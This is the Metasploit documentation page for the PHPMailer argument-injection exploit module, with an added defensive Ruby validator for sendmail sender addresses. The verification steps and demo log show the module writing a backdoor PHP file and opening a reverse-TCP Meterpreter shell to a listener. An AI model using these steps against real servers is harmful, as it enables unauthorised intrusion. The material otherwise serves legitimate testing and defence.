metasploit-framework/documentation/modules/exploit/multi/http/phpmailer_arg_injection.md

## Vulnerable Application

PHPMailer versions up to and including 5.2.20 are affected by a vulnerability that an attacker can leverage to write a file with partially controlled contents to an arbitrary location by injecting arguments that are passed to the sendmail binary. This module writes a payload to the web root of the web server and then executes it with an HTTP request. The user running PHPMailer must have write access to the specified `WEB_ROOT` directory, and successful exploitation can take a few minutes.

5.1.18 is also targeted.
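
As an added example that is not part of this module's documentation or of PHPMailer, the Ruby snippet below shows the defensive side of this bug class: a strict sender-address check that refuses anything other than a plain `local@domain` address before the address is placed in sendmail's `-f` option, so that whitespace or quoted local parts can never turn into extra command-line arguments. The function names, the sendmail path and the sample addresses are assumptions constructed for the example.

```ruby
# Added example (not the module's or PHPMailer's own code): a conservative
# envelope-sender validator. The pattern is deliberately narrower than what
# RFC 5321 permits; RFC-legal quoted local parts (spaces, quotes, backslashes)
# are exactly what lets additional sendmail arguments ride along in -f<sender>,
# so they are rejected outright.
SAFE_ADDRESS = /\A[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\z/

# Return a human-readable reason the address is unsafe to hand to sendmail,
# or nil when it is acceptable. A dash inside the local part is fine: without
# whitespace it can never be split off into a separate argument.
def sender_rejection_reason(addr)
  return 'not a string' unless addr.is_a?(String)
  return 'contains whitespace or control characters' if addr.match?(/[\s\x00-\x1f\x7f]/)
  return 'contains quote or backslash (quoted local part)' if addr.match?(/["'\\]/)
  return 'not a plain local@domain address' unless addr.match?(SAFE_ADDRESS)
  nil
end

def safe_sender?(addr)
  sender_rejection_reason(addr).nil?
end

# Build the sendmail argument vector only for a validated sender. The path and
# the -t/-i flags are assumptions; the -f<sender> option mirrors what the
# vulnerable versions passed through unchecked.
def sendmail_argv(addr, sendmail_path = '/usr/sbin/sendmail')
  reason = sender_rejection_reason(addr)
  raise ArgumentError, "refusing sender #{addr.inspect}: #{reason}" if reason
  [sendmail_path, '-t', '-i', "-f#{addr}"]
end

# Constructed sample inputs (not taken from the page).
SAMPLE_SENDERS = [
  'alice@example.com',        # plain address: accepted
  'a.b-c+tag@sub.example.org', # dots, dashes and plus tags are harmless: accepted
  '"bob smith"@example.com',  # RFC-legal quoted local part, but the space reaches the shell
  '"bob"@example.com',        # quoted local part without whitespace: still rejected
  'dave@localhost'            # no dotted domain: rejected by the strict pattern
].freeze

# Map each sample address to its rejection reason (nil means accepted).
def classify_senders(senders = SAMPLE_SENDERS)
  senders.each_with_object({}) { |s, h| h[s] = sender_rejection_reason(s) }
end

if __FILE__ == $PROGRAM_NAME
  classify_senders.each do |addr, reason|
    puts "#{reason ? 'REJECT' : 'ACCEPT'} #{addr.inspect}#{reason ? " (#{reason})" : ''}"
  end
end
```

The check runs before any string reaches the mail transport, which is the only place it can help: once the address is inside the `-f` option, escaping alone has already proven fragile for this bug class, so an allow-list on the shape of the address is the simpler control.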

## Verification Steps

  1. Install a vulnerable PHPMailer
  2. Start `msfconsole`
  3. `use exploit/multi/http/phpmailer_arg_injection`
  4. Set the `TARGETURI` and `WEB_ROOT` options as applicable
  5. `exploit`
  6. Verify the module yields a PHP meterpreter session in < 5 minutes
  7. Verify the malicious PHP file was automatically removed

## Options

**WAIT_TIMEOUT**

Seconds to wait to trigger the payload

**NameField**

Name of the element for the Name field

**EmailField**

Name of the element for the Email field

**MessageField**

Name of the element for the Message field

## Scenarios

Demo taken directly from PR7768

```
msf (S:0 J:0) exploit(php_mailer) > options

Module options (exploit/linux/http/php_mailer):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST       192.168.90.134   yes       The target address
   RPORT       8080             yes       The target port
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       Path to the application root
   TRIGGERURI                   no        Path to the uploaded payload
   VHOST                        no        HTTP server virtual host
   WEB_ROOT    /www             yes       Path to the web root


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.90.134   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf (S:0 J:0) exploit(php_mailer) > rexploit
[*] Reloading module...

[*] [2016.12.29-17:03:47] Started reverse TCP handler on 192.168.90.134:4444
[*] [2016.12.29-17:03:47] Writing the backdoor to /www/0IxI5AFB.php
[*] [2016.12.29-17:04:07] Sleeping before requesting the written file
[*] [2016.12.29-17:04:07] Waiting for up to 300 seconds to trigger the payload
[+] [2016.12.29-17:04:48] Successfully found the payload
[*] [2016.12.29-17:05:50] Sending stage (34122 bytes) to 172.17.0.2
[*] Meterpreter session 4 opened (192.168.90.134:4444 -> 172.17.0.2:47280) at 2016-12-29 17:05:50 -0500
[+] [2016.12.29-17:05:50] Deleted /www/0IxI5AFB.php
[+] [2016.12.29-17:06:10] Successfully triggered the payload

meterpreter > sysinfo
Computer    : 90f0c8e8dbe4
OS          : Linux 90f0c8e8dbe4 4.8.15-200.fc24.x86_64 #1 SMP Thu Dec 15 23:09:22 UTC 2016 x86_64
Meterpreter : php/linux

meterpreter >
```